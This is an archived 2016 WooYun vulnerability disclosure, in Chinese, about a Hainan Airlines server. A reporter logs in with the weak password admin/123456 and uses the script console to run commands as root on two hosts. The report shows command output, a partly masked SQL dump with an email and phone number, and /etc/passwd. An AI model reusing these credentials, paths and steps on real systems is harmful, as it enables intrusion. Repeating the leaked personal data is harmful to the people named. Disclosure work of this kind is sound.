破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

海南航空某系统弱口令导致两台主机命令执行

编号215425
Urlhttp://www.wooyun.org/bug.php?action=view&id=215425
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题海南航空某系统弱口令导致两台主机命令执行
漏洞类型命令执行
厂商hnair.com
白帽子路人甲
提交日期2016-06-02 13:07:00
公开日期2016-06-07 14:30:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签远程命令执行 弱口令
关注数0
收藏数0
白帽评级
白帽自评rank13
厂商评级
厂商评rank0
漏洞简介
6月份例行打卡.
漏洞细节

http://111.202.107.86:8080/
弱口令 admin 123456

111.png


http://111.202.107.86:8080/user/gang.hu/configure

111.png


http://111.202.107.86:8080/user/wangze/configure

111.png


两台终端命令执行
第一处 http://111.202.107.86:8080/computer/(master)/script
ifconfig -a

em1       Link encap:Ethernet  HWaddr 54:9F:35:10:D7:34  
inet addr:111.202.107.86 Bcast:111.202.107.87 Mask:255.255.255.248
inet6 addr: fe80::569f:35ff:fe10:d734/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5470859 errors:0 dropped:0 overruns:0 frame:0
TX packets:5268871 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2385907701 (2.2 GiB) TX bytes:1189720238 (1.1 GiB)
Interrupt:35
em2 Link encap:Ethernet HWaddr 54:9F:35:10:D7:35
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:38
em3 Link encap:Ethernet HWaddr 54:9F:35:10:D7:36
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:34
em4 Link encap:Ethernet HWaddr 54:9F:35:10:D7:37
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:36
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:33300 errors:0 dropped:0 overruns:0 frame:0
TX packets:33300 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2280784 (2.1 MiB) TX bytes:2280784 (2.1 MiB)


第二处 http://111.202.107.86:8080/computer/slave/script

em1       Link encap:Ethernet  HWaddr B0:83:FE:DF:3F:0A  
inet addr:111.202.107.85 Bcast:111.202.107.87 Mask:255.255.255.248
inet6 addr: fe80::b283:feff:fedf:3f0a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4932487 errors:0 dropped:0 overruns:0 frame:0
TX packets:4832674 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1930307007 (1.7 GiB) TX bytes:1592031438 (1.4 GiB)
Interrupt:35
em2 Link encap:Ethernet HWaddr B0:83:FE:DF:3F:0B
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:38
em3 Link encap:Ethernet HWaddr B0:83:FE:DF:3F:0C
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:34
em4 Link encap:Ethernet HWaddr B0:83:FE:DF:3F:0D
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:36
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:131027 errors:0 dropped:0 overruns:0 frame:0
TX packets:131027 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:106172131 (101.2 MiB) TX bytes:106172131 (101.2 MiB)


命令执行的就是这两台服务器

111.png


第二处 还是root权限

111.png


-rw-r--r--. 1 root root 4589636 8月 27 2015 /root/cc_haihang.sql
cat /root/cc_haihang.sql

mask 区域
*****admin` *****
*****`admin` DIS*****
*****9C9C93','[email protected]','15810985173','客服',18,2147483647,1439174061,NULL,'1'),(36,'opera*****
*****`admin` ENA*****
*****TABL*****


111.png


POC

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
pulse:x:497:496:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
memcached:x:496:493:Memcached daemon:/var/run/memcached:/sbin/nologin

修复方案

弱口令

状态信息 2016-06-02: 细节已通知厂商并且等待厂商处理中
2016-06-02: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-07: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None漏洞Rank:15 (WooYun评价)
回应信息危害等级:无影响厂商忽略忽略时间:2016-06-07 14:30